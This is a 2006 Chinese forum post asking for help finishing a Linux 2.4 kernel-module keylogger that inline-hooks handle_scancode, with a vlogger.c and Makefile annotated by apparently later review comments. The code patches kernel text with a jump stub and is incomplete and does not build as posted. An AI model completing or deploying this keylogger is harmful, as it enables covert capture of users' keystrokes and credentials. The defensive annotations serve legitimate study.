qiaiduo 发表于 2006-11-10 09:58:08

关于劫持handle_scancode函数获得键盘记录求解

本人刚接触linux ,想做一个小小的键盘记录器,从网上DOWN了一些资料,接下去不知道该怎么写了,望各位高手指点指点
vlogger.c 文件:
#ifndef __KERNEL_SYSCALLS__
#define __KERNEL_SYSCALLS__
#endif

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/string.h>
#include <linux/interrupt.h>
#include <asm/semaphore.h>
#include <linux/init.h>
#include <linux/inet.h>


#ifndef KERNEL_VERSION
#define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
#endif

#if CONFIG_MODVERSIONS==1
#define MODVERSIONS
#include <linux/modversions.h>
#endif
//#define printk printk_R1B7D4074

/*
 * State for an inline hook on the kernel's keyboard scancode handler.
 * The visible code copies CODESIZE bytes over the start of the target
 * function (see the memcpy() calls in _handle_scancode), i.e. it rewrites
 * kernel text from a loadable module.
 * For defenders: the technique depends on unrestricted module loading and on
 * writable kernel code, so the relevant controls are enforced module signing
 * and kernel lockdown, plus integrity checks of kernel text and of the
 * loaded-module list.
 */

/* Held in _handle_scancode while the target's code bytes are being swapped. */
static struct semaphore hserials_sem;
/* Gate for the printk() in _handle_scancode; non-zero means enabled. */
static int logging=1;

/* Number of bytes memcpy()'d over the start of the target function. */
#define CODESIZE 7

/*
 * Presumably meant to hold the target's original leading bytes.
 * NOTE(review): declared as a single char in this listing.
 */
static char hserials_code;
/*
 * The literal looks like x86 machine code with a zeroed address field
 * (0xb8 ... 0xff 0xe0) -- TODO confirm against the original source.
 * NOTE(review): also declared as a single char, so initialising it from a
 * string literal is a type mismatch; the listing does not build cleanly as
 * posted.
 */
static char hserials_jump="\xb8\x00\x00\x00\xff\xe0";

/*
 * Pointer to the kernel's handler, set from HS_ADDRESS. HS_ADDRESS is not
 * defined in this file; the accompanying Makefile passes it with
 * -D HS_ADDRESS=..., so the address is fixed at build time for one specific
 * kernel image.
 */
void (*handle_scancode)(unsigned char,int) =(void(*)(unsigned char,int))
HS_ADDRESS;

/*
 * Intended replacement for the kernel's handle_scancode(): print the event
 * with printk(), then forward it to the real handler.
 * Nothing in the posted listing redirects the kernel to this function.
 *
 * scancode: raw keyboard scancode, passed by value.
 * keydown:  non-zero enables the printk() below (together with `logging`).
 *
 * NOTE(review): the listing is not runnable as posted. The printk() arguments
 * treat the scancode value as a pointer (cast to char * and dereferenced),
 * which is an invalid memory access in kernel context. The memcpy() calls pass
 * hserials_code / hserials_jump, which are plain char objects in this listing.
 */
void _handle_scancode(unsigned char scancode,int keydown)
{
    /* No braces: only the printk() statement below is governed by this test. */
    if (logging && keydown)
    //    sprintf(KERN_ALERT "SCAN CODE %x .\n",(int)*((char *)scancode)&0x7F);
   //   log_scancode(scancode,LOGFILE);

   printk("Scan Code %x %s.\n",
          (int) *((char *) scancode) & 0x7F,
          *((char *) scancode) & 0x80 ? "Released" : "Pressed");
   /////////// no output (poster's note)
    /* Serialise the swap sequence below. */
    down(&hserials_sem);

    /*
     * Copy hserials_code over the target, call the real handler, then copy
     * hserials_jump back. Kernel text is rewritten twice per key event, and
     * the hook is absent between the two memcpy() calls.
     */
    memcpy(handle_scancode,hserials_code,CODESIZE);
    handle_scancode(scancode,keydown);
    memcpy(handle_scancode,hserials_jump,CODESIZE);
    up(&hserials_sem);
}

/*
 * Module load entry point. Empty in the posted listing: it returns 0
 * (success) without performing any setup, so loading the module as shown
 * leaves the kernel's keyboard path untouched.
 */
int init_module(void)
{
   // (poster's note: not sure what to write here)
return 0;
}

/*
 * Module unload entry point. Empty in the posted listing; nothing is undone
 * or released here.
 */
void cleanup_module(void)
{


return;
}

/* Declares the module's license string as "GPL". */
MODULE_LICENSE("GPL");


makefile 文件:

# Makefile for a basic kernel module
# Builds vlogger.o against the kernel headers under /usr/src/linux-2.4.

# Address of handle_scancode, taken at build time: the first word of the
# `ksyms -a | grep handle_scancode` output on the build host, prefixed with 0x.
# The value is compiled into the object via -D HS_ADDRESS below, so the module
# only matches the kernel image it was built against.
# For defenders: this step depends on kernel symbol addresses being readable
# on the host; current kernels can restrict that (kernel.kptr_restrict).
HS_ADDRESS=0x$(word 1,$(shell ksyms -a|grep handle_scancode))

CC=/usr/bin/gcc
# Kernel-module compile flags; HS_ADDRESS reaches vlogger.c as a macro.
MODCFLAGS = -O6 -Wall -DCONFIG_KERNELD \
        -DMODULE -D__KERNEL__ -DLINUX -D HS_ADDRESS=$(HS_ADDRESS)\
        -I/usr/src/linux-2.4/include
# NOTE(review): the prerequisite list reads as a single path
# ("vlogger.c/usr/include/linux/version.h"); a separating space appears to
# have been lost in the post.
vlogger.o: vlogger.c/usr/include/linux/version.h
        $(CC) $(MODCFLAGS) -c vlogger.c
# Remove build outputs.
clean:
        rm -f *.o